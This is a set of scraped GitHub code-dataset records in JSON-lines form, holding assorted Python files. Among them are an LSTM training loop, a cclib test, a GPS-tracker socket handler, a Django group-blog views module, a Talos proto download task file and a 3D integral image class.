ind[math.floor(np.size(y)*.6):math.floor(np.size(y)*.8)]\n test_idx = ind[math.floor(np.size(y)*.8):]\n\n if np.size(np.unique(y[test_idx]))==1:\n continue\n if np.size(np.unique(y[val_idx]))==1:\n continue\n \n input_size = feat - args.option \n input_data1 = input_data[:,:,args.option:feat]\n input_data1 = torch.tensor(input_data1)\n label=torch.tensor(y)\n \n data_set = [(input_data1[i], label[i]) for i in range(sample_size)]\n \n ind_0=np.where(label[train_idx]==0)[0]\n ind_1=np.where(label[train_idx]==1)[0] \n\n ind_0 = np.array(train_idx)[ind_0]\n ind_1 = np.array(train_idx)[ind_1]\n ### oversampling \n\n if np.size(ind_0)>np.size(ind_1):\n ind_11=np.random.choice(ind_1,np.size(ind_0))\n new_train_idx = np.concatenate([ind_11,ind_0])\n else:\n ind_00=np.random.choice(ind_0,np.size(ind_1))\n new_train_idx = np.concatenate([ind_00,ind_1])\n\n #new_train_idx = train_idx\n nearest_multiple = batch_size * math.ceil(len(new_train_idx)/batch_size)\n add = nearest_multiple - len(new_train_idx)\n new_train_idx = np.concatenate((new_train_idx,new_train_idx[0:add]))\n \n train_sampler = SubsetRandomSampler(new_train_idx)\n val_sampler = SubsetRandomSampler(val_idx)\n test_sampler = SubsetRandomSampler(test_idx)\n\n train_loader = torch.utils.data.DataLoader(dataset=data_set,\n batch_size=batch_size,\n sampler=train_sampler,\n shuffle=False,\n num_workers=0,\n pin_memory=True)\n\n val_loader = torch.utils.data.DataLoader(dataset=data_set,\n batch_size=len(val_idx),\n sampler=val_sampler,\n shuffle=False,\n num_workers=0,\n pin_memory=True)\n\n test_loader = torch.utils.data.DataLoader(dataset=data_set,\n batch_size=len(test_idx),\n sampler=test_sampler,\n shuffle=False,\n num_workers=0,\n pin_memory=True)\n\n # Initialize network\n model = RNN_LSTM(input_size, hidden_size, num_layers, num_classes).to(device)\n #model = nn.DataParallel(model)\n # Loss and optimizer\n criterion = nn.BCELoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate,weight_decay=1e-5)\n scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer, 0.99, last_epoch=-1)\n\n best_val=None\n torch.autograd.set_detect_anomaly(True)\n\n for epoch in range(num_epochs):\n model.train()\n \n for batch_idx, (data, targets) in enumerate(train_loader):\n\n data = data.to(device)\n targets = targets.to(device)\n scores = model(data)\n\n loss = criterion(scores, targets)\n optimizer.zero_grad()\n loss.backward()\n\n optimizer.step()\n\n val_auc, threshold = validation(epoch, val_loader, model)\n \n if best_val is None:\n is_best = True\n best_val = val_auc\n else:\n is_best = val_auc > best_val\n best_val = max(val_auc, best_val)\n\n if is_best: # make a copy of the best model\n model_best = copy.deepcopy(model)\n \n scheduler.step()\n\n test_auc, test_aucpr, test_f1, test_spec, test_sen, test_pre , cls_rpt= check_accuracy(epoch, test_loader, model_best,threshold) #\n AUC.append(test_auc)\n AUCPR.append(test_aucpr)\n F1.append(test_f1)\n SPECIFICITY.append(test_spec)\n SENSITIVITY.append(test_sen)\n PRECISION.append(test_pre)\n \n \n print('average AUC:',np.nanmean([AUC]))\n print('average AUCPR:',np.nanmean([AUCPR]))\n print('average F1:',np.nanmean([F1]))\n print('average specificity:',np.nanmean([SPECIFICITY]))\n print('average sensitivity:',np.nanmean([SENSITIVITY]))\n print('average precision:',np.nanmean([PRECISION]))\n","repo_name":"compbiolabucf/Teddy","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":16217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72785597284","text":"import unittest\n\nimport numpy\n\nfrom cclib.bridge import cclib2biopython\nfrom cclib.parser.utils import find_package\n\n\nclass BiopythonTest(unittest.TestCase):\n \"\"\"Tests for the cclib2biopython bridge in cclib.\"\"\"\n\n def setUp(self):\n super(BiopythonTest, self).setUp()\n if not find_package(\"Bio\"):\n raise ImportError(\"Must install biopython to run this test\")\n\n def test_makebiopython(self):\n from Bio.PDB.Superimposer import Superimposer\n atomnos = numpy.array([1, 8, 1], \"i\")\n a = numpy.array([[-1, 1, 0], [0, 0, 0], [1, 1, 0]], \"f\")\n b = numpy.array([[1.1, 2, 0], [1, 1, 0], [2, 1, 0]], \"f\")\n si = Superimposer()\n si.set_atoms(cclib2biopython.makebiopython(a, atomnos),\n cclib2biopython.makebiopython(b, atomnos))\n ref = 0.29337859596\n assert abs(si.rms - ref) < 1.0e-6\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"cclib/cclib","sub_path":"test/bridge/testbiopython.py","file_name":"testbiopython.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":286,"dataset":"github-code","pt":"52"} +{"seq_id":"70250040164","text":"from StimListGen import *\nfrom WritingScenarios import *\n# set number of subject scenario files\nN = 32\n# Alternate which block type occurs first\nFirst = ['composition','list','composition','list'] * (N/4) # adjust for remainders\n# And which button is the \"match\" response\nButton =['left','left','right','right'] * (N/4) # adjust for remainders\n# Generate the scenario files\nfor i in range(0,N):\n subject_idx = i\n FirstBlock = First[i]\n MatchButton = Button[i]\n make_subject_stimlists(subject_idx)\n write_scenario_files(subject_idx, FirstBlock, MatchButton)\n","repo_name":"grahamflick/Minimal-Composition-MEG-Design-Materials","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8172581752","text":"from library.constants import *\n\n\nclass Rectangle:\n PATH_TO_DATASET = 'rect_'\n\n PATH_TO_CLASS = 'dataset_generation.dataset_objects.rectangle.rectangle'\n CLASS = 'Rectangle'\n\n GENERATION_CONFIG = {\n TRAIN_CNT: 20,\n TEST_CNT: 0,\n\n CENTER_INIT: (100, 100, 100),\n CENTER_RANDOMIZE: 20,\n\n SIZE_INIT: 45,\n SIZE_RANDOMIZE: 10,\n\n DOT_RANDOMIZE: 3,\n\n ROTATE_ANGLES: ((20, 60), (20, 60), (20, 60)),\n\n CURVES: (1, 2),\n CURVE_DISTANCE: 1.5,\n\n HATCH_SIZE: 4,\n HATCH_RANDOMIZE: 1,\n }\n\n CREATION_CONFIG = {\n CENTER_INIT: (100, 100, 100),\n CENTER_RANDOMIZE: 0,\n\n SIZE_INIT: 70,\n SIZE_RANDOMIZE: 0,\n\n DOT_RANDOMIZE: 0,\n\n ROTATE_ANGLES: ((60, 60), (60, 60), (60, 60)),\n\n CURVES: (0, 0),\n CURVE_DISTANCE: 0,\n\n HATCH_SIZE: 4,\n HATCH_RANDOMIZE: 0,\n }\n","repo_name":"Myroslav341/course_work","sub_path":"config/dataset_objects/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11472221830","text":"from datetime import datetime\nimport os\nimport binascii\nimport base64\nimport socket\nfrom kernel.utils import NeedMoreDataException\nfrom kernel.logger import log\nfrom kernel.config import conf\nfrom lib.broker import broker\n\n\nclass AbstractHandler(object):\n \"\"\"\n Abstract class for all implemented protocols\n \"\"\"\n _packetsFactory = None # packets factory link\n _commandsFactory = None # commands factory link\n\n _buffer = None # buffer of the current dispatch loop (for storage save)\n _uid = None # identifier of currently connected device\n\n def __init__(self, store, clientThread):\n \"\"\"\n Constructor of Listener.\n @param store: kernel.pipe.Manager instance\n @param clientThread: Instance of kernel.server.ClientThread\n \"\"\"\n self.__handlerId = binascii.hexlify(os.urandom(4)).decode()\n self.__store = store\n self.__thread = clientThread\n self.initialization()\n\n def __del__(self):\n \"\"\"\n Destructor of Listener\n @return:\n \"\"\"\n self.finalization()\n\n def initialization(self):\n \"\"\"\n Initialization of the handler\n @return:\n \"\"\"\n log.debug('[%s] initialization', self.handlerId)\n broker.handlerInitialize(self)\n\n def finalization(self):\n \"\"\"\n Finalization of the handler.\n Free allocated resources.\n @return:\n \"\"\"\n log.debug('[%s] finalization', self.handlerId)\n broker.handlerFinalize(self)\n\n @property\n def handlerId(self):\n return self.__handlerId\n\n @property\n def uid(self):\n return self._uid\n\n @uid.setter\n def uid(self, value):\n self._uid = value\n broker.handlerUpdate(self)\n\n def getStore(self):\n \"\"\" Returns store object \"\"\"\n return self.__store\n\n def getThread(self):\n \"\"\" Returns clientThread object \"\"\"\n return self.__thread\n\n def dispatch(self):\n \"\"\"\n Data processing method (after validation) from the device:\n clientThread thread of the socket;\n \"\"\"\n log.debug('[%s] dispatch()', self.handlerId)\n buffer = self.recv()\n while len(buffer) > 0:\n self.processData(buffer)\n buffer = self.recv()\n log.debug('[%s] dispatch() - EXIT (empty buffer?)', self.handlerId)\n\n def needProcessCommands(self):\n \"\"\"\n Returns false if we can not process commands\n @return: boolean\n \"\"\"\n return self.uid\n\n def processData(self, data):\n \"\"\"\n Processing of data from socket / storage.\n Might be overridden in child classes\n @param data: Data from socket\n \"\"\"\n if self._packetsFactory:\n try:\n if self._buffer is None:\n self._buffer = b''\n self._buffer += data\n protocolPackets = (\n self._packetsFactory.getPacketsFromBuffer(self._buffer)\n )\n for protocolPacket in protocolPackets:\n self.processProtocolPacket(protocolPacket)\n self._buffer = None\n except NeedMoreDataException as E:\n log.info('[%s] Need more data...', self.handlerId)\n return\n except Exception as E:\n log.error(\"[%s] processData error: %s\", self.handlerId, E)\n\n log.debug('[%s] Checking handler commands', self.handlerId)\n if not self.needProcessCommands():\n return self\n log.debug('[%s] Ok we can process commands!', self.handlerId)\n\n self.processCommands()\n return self\n\n def processProtocolPacket(self, protocolPacket):\n \"\"\"\n Process protocol packet.\n @type protocolPacket: packets.Packet\n @param protocolPacket: Protocol packet\n \"\"\"\n pass\n\n def recv(self):\n \"\"\"\n Receiving data from socket\n @return: String representation of data\n \"\"\"\n\n sock = self.getThread().request\n sock.settimeout(60) # timeout eq. 5 seconds\n total_data = []\n while True:\n try:\n data = sock.recv(conf.socketPacketLength)\n except socket.timeout:\n self.processEvents()\n continue\n except Exception as E:\n log.debug('[%s] %s', self.handlerId, E)\n break\n log.debug('[%s] Data chunk = %s', self.handlerId, data)\n total_data.append(data)\n # I don't know why [if not data: break] is not working,\n # so let's do break here\n if len(data) < conf.socketPacketLength: break\n log.debug('[%s] Total data = %s', self.handlerId, total_data)\n\n return b''.join(total_data)\n\n def send(self, data):\n \"\"\"\n Sends data to a socket\n @param data: data\n \"\"\"\n thread = self.getThread()\n if thread:\n sock = thread.request\n sock.send(data)\n else:\n log.error(\"[%s] Handler thread is not found!\", self.handlerId)\n return self\n\n def processEvents(self):\n \"\"\"\n Process some events while waiting for data from device\n @return:\n \"\"\"\n pass\n\n def store(self, packets):\n \"\"\"\n Sends a list of packets to store\n @param packets: A list of packets\n @return: Instance of lib.falcon.answer.FalconAnswer\n \"\"\"\n result = self.getStore().send(packets)\n if result.isSuccess():\n log.debug('[%s] store() ... OK', self.handlerId)\n else:\n errorsList = result.getErrorsList()\n log.error('[%s] store():\\n %s', self.handlerId, errorsList)\n return result\n\n def translate(self, data):\n \"\"\"\n Translate gps-tracker data to observer pipe format\n @param data: dict() data from gps-tracker\n \"\"\"\n raise NotImplementedError(\n \"Not implemented Handler::translate() method\")\n\n def translateConfig(self, data):\n \"\"\"\n Translate gps-tracker config data to observer format\n @param data: {string[]} data from gps-tracker\n \"\"\"\n raise NotImplementedError(\n \"Not implemented Handler::translateConfig() method\")\n\n def sendImages(self, images):\n \"\"\"\n Sends image to the observer\n @param images: dict() of binary data like {'camera1': b'....'}\n \"\"\"\n if not self.uid:\n log.error('[%s] Cant send an image - self.uid is not defined!',\n self.handlerId)\n return\n imagesList = []\n for image in images:\n image['content'] = base64.b64encode(image['content']).decode()\n imagesList.append(image)\n observerPacket = {\n 'uid': self.uid,\n 'time': datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f'),\n 'images': imagesList\n }\n result = self.store(observerPacket)\n if result.isSuccess():\n log.info('[%s] sendImages(): Images have been sent.',\n self.handlerId)\n else:\n # ? Error messages should be converted into readable format\n log.error('[%s] sendImages():\\n %s',\n self.handlerId, result.getErrorsList())\n\n def setPacketSensors(self, packet, sensor):\n \"\"\"\n Makes a copy of some packet data into sensor\n @param sensor: dict\n @param packet: dict\n @return: self\n \"\"\"\n if (packet and sensor and\n isinstance(packet, dict) and\n isinstance(sensor, dict)):\n for key in ['latitude', 'longitude',\n 'altitude', 'speed',\n 'hdop', 'azimuth']:\n if key in packet:\n sensor[key] = packet[key]\n packet['sensors'] = sensor.copy()\n return self\n\n def getConfigOption(self, key, defaultValue = None):\n \"\"\"\n Returns configuration option by its key\n @param key: Configuration key\n @param defaultValue: Default value if key is not found\n @return: mixed\n \"\"\"\n if conf.has_section('settings'):\n section = conf['settings']\n return section.get(key, defaultValue)\n return defaultValue\n\n def processCommands(self):\n \"\"\"\n Processing AMQP commands for current device\n \"\"\"\n try:\n if not self._commandsFactory:\n raise Exception(\"_commandsFactory is not defined!\")\n commands = broker.getCommands(self)\n if commands:\n log.debug(\"[%s] Received commands are: %s\",\n self.handlerId, commands)\n self.processCommand(commands)\n except Exception as E:\n log.error('[%s] %s', self.handlerId, E)\n\n def processCommand(self, command):\n \"\"\"\n Processing AMQP command\n @param command: command\n \"\"\"\n if not command:\n log.error(\"[%s] Empty command description!\", self.handlerId)\n return\n\n if (not self.uid) and ('uid' in command):\n self.uid = command['uid']\n\n log.debug(\"[%s] Processing AMQP command: %s \", self.handlerId, command)\n try:\n if not self._commandsFactory:\n raise Exception(\"_commandsFactory is not defined!\")\n commandName = command[\"command\"]\n commandInstance = self._commandsFactory.getInstance(command)\n if commandInstance:\n log.debug(\"[%s] Command class is %s\",\n self.handlerId, commandInstance.__class__)\n self.sendCommand(commandInstance, command)\n else:\n broker.sendAmqpError(self, \"Command is not supported\")\n log.error(\"[%s] No command with name %s\",\n self.handlerId, commandName)\n except Exception as E:\n log.error(\"[%s] Send command error is %s\", self.handlerId, E)\n\n def sendCommand(self, command, initialParameters = None):\n \"\"\"\n Sends command to the handler\n @param command: AbstractCommand instance\n @param initialParameters: dict Initial command parameters\n \"\"\"\n if not initialParameters:\n raise Exception(\"Empty initial parameters!\")\n\n config = {}\n if \"config\" in initialParameters:\n config = initialParameters[\"config\"]\n transport = initialParameters[\"transport\"]\n\n commandData = command.getData(transport) or []\n if not isinstance(commandData, list):\n commandData = [{\"message\": commandData}]\n\n for item in commandData:\n if not isinstance(item, dict):\n item = {\"message\": item}\n buffer = item[\"message\"]\n if transport == \"tcp\":\n self.send(buffer)\n log.debug('[%s] Command data is sent: %s',\n self.handlerId, buffer)\n elif transport == \"sms\":\n data = {\n 'type': transport,\n 'message': buffer,\n 'remaining': 1\n }\n if 'address' in config:\n data['send_to'] = config['address']\n if 'callback' in config:\n data['callback'] = config['callback']\n if 'id_object' in config:\n data['id_object'] = config['id_object']\n if 'id_firm' in config:\n data['id_firm'] = config['id_firm']\n if 'from' in config:\n data['params'] = {}\n data['params']['from'] = config['from']\n log.debug('[%s] Sending AMQP message to [work.process]...',\n self.handlerId)\n broker.send([data],\n routing_key = 'n.work.work.process',\n exchangeName = 'n.work')\n\n if transport == \"sms\":\n # immediate sending of command update message\n broker.sendAmqpAnswer(self,\n \"Command was successfully received and processed\")\n\n #def initAmqpCommandThread(self):\n # \"\"\"\n # AMQP thread initialization\n # \"\"\"\n # if not self.uid:\n # log.error('initAmqpCommandThread(): self.uid is empty!')\n # return\n # # start message broker thread for receiving tcp commands\n # from lib.broker import MessageBrokerCommandThread\n # log.debug('%s::initAmqpCommandThread()', self.__class__)\n # MessageBrokerCommandThread(self)\n\n @classmethod\n def initAmqpThread(cls, protocol):\n \"\"\"\n AMQP thread initialization\n \"\"\"\n log.debug('%s::initAmqpThread() / %s', cls, protocol)\n # start message broker thread for receiving sms commands\n from lib.broker import MessageBrokerThread\n MessageBrokerThread(cls, protocol)\n","repo_name":"maprox/pipe","sub_path":"lib/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":13013,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"27948982840","text":"import sys\nimport math\nimport computes_with_generator as cg\n\nclass Group:\n def __init__(self, n):\n self.elements = []\n for x in range(n):\n if math.gcd(x, n) == 1:\n self.elements.append(x)\n print(\"Group of units modulo\", n, \"contains:\", len(self.elements),\n \" elements\", self.elements)\n\n\nclass Order:\n def __init__(self, order, generator):\n self.order = order\n self.elements = []\n self.elements.append(generator)\n def output(self):\n print(self.order, \":\", self.elements)\n\n\nn = int(sys.argv[1])\ng = Group(n)\n\norders = []\nfor x in g.elements:\n t = 1\n while t < n:\n if (x**t - 1)%n == 0:\n added = False\n for o in orders:\n if t == o.order:\n o.elements.append(x)\n added = True\n break\n if added:\n break\n o = Order(t, x)\n orders.append(o)\n break\n t=t+1\n\nprint(\"Orders in form of order: element1, element2, ...\")\nfor o in orders:\n o.output()\n cg.computes_with_generator(o.elements[0], o.order, n)\n print('')","repo_name":"aaanoifjia/zawu","sub_path":"math/cyclic-group/group_of_units_modulo_n.py","file_name":"group_of_units_modulo_n.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9611554209","text":"\nn=int(input())\ns=input()\nans=s.count(\"E\")\nif s[0]==\"E\": ans-=1\nchk=ans\nfor a,i in enumerate(s[1:]):\n if i==\"E\": chk-=1\n if s[a]==\"W\": chk+=1\n ans=min(ans,chk)\nprint(ans)\n\n","repo_name":"clarinet758/atcoder","sub_path":"abc/b076_100/b098/c1.py","file_name":"c1.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"el","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31142747206","text":"from invoke import task\nimport fsspec\nfrom pathlib import Path\nimport re\nimport tomlkit\n\n\n@task\ndef download_protos(c, username=None, token=None):\n c.run(\"rm -rf protos\")\n print(f\"Downloading proto files for Talos API {c['api_version']} to ./protos\")\n source_repo = fsspec.filesystem(\n \"github\",\n org=\"siderolabs\",\n repo=\"talos\",\n sha=c[\"api_version\"],\n username=username,\n token=token,\n )\n destination = Path(\"./protos\")\n destination.mkdir(exist_ok=True)\n source_repo.get(source_repo.ls(\"api/\"), destination.as_posix(), recursive=True)\n source_repo.get(\"LICENSE\", (destination / \"LICENSE\").as_posix())\n\n\n@task\ndef patch_pyproject_toml(c):\n api_version = c[\"api_version\"]\n print(f\"Patching pyproject.toml with API version tag {api_version}\")\n with open(\"pyproject.toml\", \"r\") as file:\n config = tomlkit.load(file)\n\n config[\"project\"][\"name\"] = f\"talos-linux-api-{api_version}\"\n config[\"project\"][\"description\"] = re.sub(\n \"\\(.*\\)\", f\"({api_version})\", config[\"project\"][\"description\"]\n )\n\n with open(\"pyproject.toml\", \"w\") as file:\n tomlkit.dump(config, file)\n\n\n@task\ndef clean(c):\n c.run(\"rm -rf src\")\n\n\n@task(clean)\ndef compile(c):\n module_name = c[\"api_version\"].replace(\".\", \"_\")\n out_dir = Path(\"src/talos_linux_api\") / module_name\n print(f\"Compiling to {out_dir}\")\n out_dir.mkdir(exist_ok=True, parents=True)\n c.run(\n \"protoc \"\n f\"--python_betterproto_out={out_dir.as_posix()} \"\n \"-I protos \"\n \"-I protos/vendor \"\n '$(find protos -name \"*.proto\" -and -not -path \"*vendor*\")'\n )\n\n\n@task(compile, patch_pyproject_toml)\ndef build(c):\n c.run(\"pytest\")\n","repo_name":"stereobutter/talos-linux-api","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"21400140354","text":"from multiprocessing import context\nimport pstats\nfrom tokenize import group\nfrom turtle import title\nfrom django.shortcuts import render,redirect\nfrom .models import *\nfrom .forms import *\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.conf import settings\nfrom django.core.mail import send_mail\nfrom .tokens import account_activation_token\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.utils.encoding import force_bytes, force_text\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.template.loader import render_to_string\nfrom django.core.mail import EmailMessage\nfrom django.http import HttpResponse\nfrom django.db.models import Q\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.template.defaultfilters import slugify\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.decorators import login_required\n\ndef register(request):\n if request.method== 'POST':\n fullname= request.POST.get('name')\n username= request.POST.get('username')\n email= request.POST.get('email')\n password= request.POST.get('password')\n if User.objects.filter(email=email):\n return redirect(request, 'signup.html')\n user_obj= User(username=username, email=email, first_name= fullname) \n user_obj.set_password(password)\n user_obj.save()\n user = authenticate(username=username, password=password)\n login(request, user)\n \n return redirect('list')\t\n return render(request, 'home.html')\n\n@login_required(login_url=\"\")\ndef create_group(request):\n if request.method== 'POST':\n title = request.POST.get('title')\n slug = title.replace(\" \",\"-\")\n description= request.POST.get('description')\n gropu_obj= Group.objects.create(author=request.user,slug=slug, title= title , description= description)\n gropu_obj.save()\n return redirect('list')\t\n return render(request, 'home.html')\n\n\ndef loginUser(request):\n if request.user.is_authenticated:\n return redirect('list')\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n user = User.objects.get(username=username)\n if user:\n username = user.username\n user = authenticate(request, username=username, password=password) # check password\n\n if user is not None:\n login(request, user)\n return redirect('list')\t\n \n return render(request,'home.html',)\n\ndef logoutUser(request):\n logout(request)\n return redirect('/')\n\n@login_required(login_url=\"\")\ndef create_post(request):\n if request.method== 'POST':\n post_text= request.POST.get('post_text')\n slug= request.POST.get('slug')\n group_obj = Group.objects.get(slug=slug)\n title = request.POST.get('title')\n post_obj= Post.objects.create(group = group_obj, post_by=request.user, title=title, post_text= post_text )\n post_obj.save()\n\n return redirect(reverse('detail', args = [slug]))\n return render(request,'home.html')\n\n@login_required(login_url=\"\")\ndef create_comment(request):\n \n if request.method== 'POST':\n\n id = request.POST.get('id')\n post_obj = Post.objects.get(id=id)\n description= request.POST.get('comment')\n comment_obj= PostComment.objects.create(name = request.user, description= description, post = post_obj)\n comment_obj.save()\n\n return redirect(reverse('post',args=[id]))\n return render(request,'home.html')\n\n@login_required(login_url=\"\")\ndef create_reply(request):\n \n if request.method== 'POST':\n comment_id= request.POST.get('id')\n description= request.POST.get('comment')\n post_id = request.POST.get('post_id')\n \n comment_obj = PostComment.objects.get(id=comment_id)\n comment_obj= CommentReply.objects.create(name = request.user, description= description, comment = comment_obj )\n comment_obj.save()\n\n return redirect(reverse('post', args = [post_id]))\n return render(request,'home.html')\n\n@login_required(login_url=\"\")\ndef join_group(request,id):\n \n Group_obj = Group.objects.get(slug=id)\n GroupJoined_obj = GroupJoined.objects.create(joined_group=Group_obj, joined_by=request.user)\n GroupJoined_obj.save()\n\n return redirect(reverse('detail', args = [id]))\n\ndef GroupList(request):\n groups = Group.objects.all()\n resent_groups = Group.objects.all()[:4]\n count = groups.count()\n\n paginator = Paginator(groups ,10) # Shows only 10 records per page\n\n page = request.GET.get('page')\n try:\n group = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n group = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 7777), deliver last page of results.\n group = paginator.page(paginator.num_pages)\n \n for i in (group):\n i.description=i.description[:500]\n context = {\n 'groups':groups,\n 'group':group,\n 'count':count,\n 'resent_groups':resent_groups\n }\n return render(request,'grouplist.html',context)\n\n\ndef GroupDetail(request,slug):\n resent_groups = Group.objects.all()[:4]\n group = Group.objects.get(slug=slug)\n posts= Post.objects.filter(group=group)\n temp = False\n\n for g in GroupJoined.objects.filter(joined_group=group):\n if g.joined_by == request.user:\n temp = True\n context = {\n 'group':group,\n 'posts':posts,\n 'is_member':temp,\n 'resent_groups':resent_groups\n }\n return render(request,'groupdetail.html',context)\n\n@login_required(login_url=\"\")\ndef GroupMembers(request, slug):\n group = Group.objects.get(slug=slug)\n resent_groups = Group.objects.all()[:4]\n members = GroupJoined.objects.filter(joined_group=group)\n context = {\n 'group':group,\n 'members':members,\n 'resent_groups':resent_groups\n }\n return render(request,'groupmembers.html',context)\n\ndef ViewPost(request,id):\n post_obj = Post.objects.get(id=id)\n post_comment = PostComment.objects.filter(post=post_obj)\n\n resent_groups = Group.objects.all()[:4]\n\n context = {\n 'post':post_obj,\n 'comments':post_comment,\n 'resent_groups':resent_groups\n }\n return render(request,'post.html',context)\n\n@login_required(login_url=\"\")\ndef view_profile(request,id):\n user_obj = User.objects.get(id=id)\n\n resent_groups = Group.objects.all()[:4]\n context = {\n 'user_obj':user_obj,\n 'resent_groups':resent_groups\n }\n return render(request, 'profile.html',context)\n\n@login_required(login_url=\"\")\ndef user_post(request,id):\n user_obj = User.objects.get(id=id)\n posts = Post.objects.filter(post_by=user_obj)\n resent_groups = Group.objects.all()[:4]\n\n context = {\n 'user_obj':user_obj,\n 'posts':posts,\n 'resent_groups':resent_groups\n }\n return render(request, 'user_post.html',context)\n\ndef home(request):\n resent_groups = Group.objects.all()[:4]\n context = {\n 'resent_groups':resent_groups\n }\n return render(request,'home.html',context)","repo_name":"TayyabImran009/group-blogs","sub_path":"blogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16118085854","text":"\"\"\" This module provides an interface to calculate values inside a box given\n a set of coordinates and an image \"\"\"\nimport os\nimport ctypes as ct\nimport numpy as np\n\n\nclass IntegralImage(object):\n \"\"\"Class to handle cumulative summed table along with 3D integral image\"\"\"\n\n def __init__(self, img):\n # initialize with the 3d integral image\n self._integral_image = self._integral_image_3d(img)\n\n # keep map sizes\n self._x_size = self._integral_image.shape[0]\n self._y_size = self._integral_image.shape[1]\n self._z_size = self._integral_image.shape[2]\n\n # set ctype function handler\n current_file_dir = os.path.dirname(__file__)\n self._lib = ct.cdll.LoadLibrary(current_file_dir +\n '/lib/libintegral_images_3d.so')\n\n def _integral_image_3d(self, img):\n \"\"\"Calculates a 3D integral image from an input image.\n\n :param img : W x H x L array\n Integral image of size W x H x L\n\n :return rt_image : IntegralImage object\n Object containing integral image and its parameters.\n Returns empty list on failure.\n \"\"\"\n # Check if points are 3D otherwise early exit\n if img.ndim != 3:\n raise ValueError('Not a 3D image for integral image: input dim {}'\n .format(img.ndim))\n\n integral_image = np.cumsum(np.cumsum(np.cumsum(img, 0), 1), 2)\n # pad integral image with 0s on one side of each dimension\n # so that when accessing coordinate n-1, we get a valid value of 0\n integral_image = np.pad(integral_image, ((1, 0), (1, 0), (1, 0)),\n 'constant', constant_values=0)\n\n # Convert to fortran style array for ctype function call for query\n integral_image = np.asfortranarray(integral_image, dtype=np.float32)\n\n return integral_image\n\n def query(self, cuboids):\n \"\"\"Input is an array of 3D cuboids 6 coordinates. Each column\n represents a cuboid in the format [x1, y1, z1, x2, y2, z2].T. Thus,\n the dimensions should be 6 x N. The 2 sets of 3D coordinates represent\n the 2 corners of the bounding box. The first set of coordinates is the\n point closest to the origin of the image. The second set of coordinates\n is the point farthest from the origin. img is the integral image array.\n\n :param cuboids : 6 x N ndarray\n Contains the (x1, y1, z1) and (x2, y2, z2) coordinates\n of the box to query.\n\n :return param : N x 1 ndarray\n List consists of values contained inside box specified by\n coordinates from cuboids. Empty on failure.\n \"\"\"\n cuboids = np.asarray(cuboids)\n\n # check size\n if cuboids.shape[0] != 6:\n raise ValueError(\n 'Incorrect number of dimensions for query: input dim {}'.format(cuboids.shape[0]))\n\n if cuboids.shape[1] < 1:\n raise ValueError(\n 'The dimension N must be greater than 1: input dim {}'.format(cuboids.shape[1]))\n\n if cuboids.dtype != np.uint32:\n raise TypeError('Cuboids must be type of np.uint32')\n\n # Convert given array to a fortran contiguous array with dtype uint32\n # Add 1 for first 3 rows to account for zero-padding in first coordinate\n cuboids[:3, :] += 1\n\n cuboids = np.asfortranarray(cuboids)\n\n # Clip all the maximum coordinates to the voxelgrid size\n # Note: The integral image gets zero padded.\n max_extents = np.array(\n [self._x_size, self._y_size, self._z_size,\n self._x_size, self._y_size, self._z_size]) - 1\n\n cuboids = np.minimum(cuboids, max_extents.reshape(6, -1)) \\\n .astype(np.uint32)\n\n int_img_fnc = self._lib.integralImage3D\n int_img_fnc.restypes = None\n int_img_fnc.argtypes = [\n # list that stores outputs\n np.ctypeslib.ndpointer(dtype=np.float32,\n flags='C_CONTIGUOUS'),\n # list of box coordinates\n np.ctypeslib.ndpointer(dtype=np.uint32,\n flags='F_CONTIGUOUS'),\n ct.c_uint, # number of boxes\n # integral image\n np.ctypeslib.ndpointer(dtype=np.float32,\n flags='F_CONTIGUOUS'),\n ct.c_uint, # width of integral image\n ct.c_uint, # height of integral image\n ct.c_uint, # length of integral image\n ]\n\n num_of_cuboids = cuboids.shape[1]\n\n # initialize output array\n output = np.empty((num_of_cuboids, 1), dtype=np.float32, order='C')\n\n int_img_fnc(output, cuboids, ct.c_uint(num_of_cuboids), self._integral_image,\n ct.c_uint(self._x_size), ct.c_uint(self._y_size), ct.c_uint(self._z_size))\n\n return output\n","repo_name":"ZiningWang/Sparse_Pooling","sub_path":"avod/wavedata/wavedata/tools/core/integral_image.py","file_name":"integral_image.py","file_ext":"py","file_size_in_byte":5287,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"52"} +{"seq_id":"27830087706","text":"#import logging as log\n#log.basicConfig( level=log.DEBUG, format='%(asctime)s %(levelname)s: %(message)s', datefmt='%I:%M:%S' )\n#log.basicConfig( 